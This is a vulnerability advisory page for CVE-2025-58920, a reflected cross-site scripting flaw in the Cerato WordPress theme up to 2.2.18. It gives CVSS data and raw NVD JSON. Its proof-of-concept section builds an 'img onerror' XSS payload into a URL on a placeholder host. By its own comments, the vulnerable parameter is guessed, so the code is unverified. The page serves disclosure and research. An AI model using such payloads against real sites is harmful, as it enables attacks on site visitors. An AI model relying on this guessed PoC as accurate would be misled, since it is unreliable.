Security Vulnerability Report
中文
CVE-2025-58920 CVSS 7.1 HIGH

CVE-2025-58920

Published: 2026-04-10 14:16:25
Last Modified: 2026-04-24 18:00:32

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato cerato allows Reflected XSS.This issue affects Cerato: from n/a through <= 2.2.18.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Zootemplate Cerato <= 2.2.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for Reflected XSS in Cerato Theme --> <!-- Note: The specific vulnerable parameter needs to be confirmed via source code review or fuzzing --> <html> <body> <script> // Define the malicious payload var payload = "<img src=x onerror=alert('CVE-2025-58920')>"; // Hypothetical vulnerable endpoint (replace with actual path if known) // Often search fields or similar parameters are vulnerable in themes var targetUrl = "http://target-site.com/?search=" + encodeURIComponent(payload); // Log the generated exploit URL console.log("Exploit URL: " + targetUrl); // In a real scenario, the victim would click a link pointing to targetUrl // For demonstration, we simply print the URL document.body.innerHTML = "<a href='" + targetUrl + "'>Click to test PoC</a>"; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58920", "sourceIdentifier": "[email protected]", "published": "2026-04-10T14:16:25.283", "lastModified": "2026-04-24T18:00:32.033", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato cerato allows Reflected XSS.This issue affects Cerato: from n/a through <= 2.2.18."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/cerato/vulnerability/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}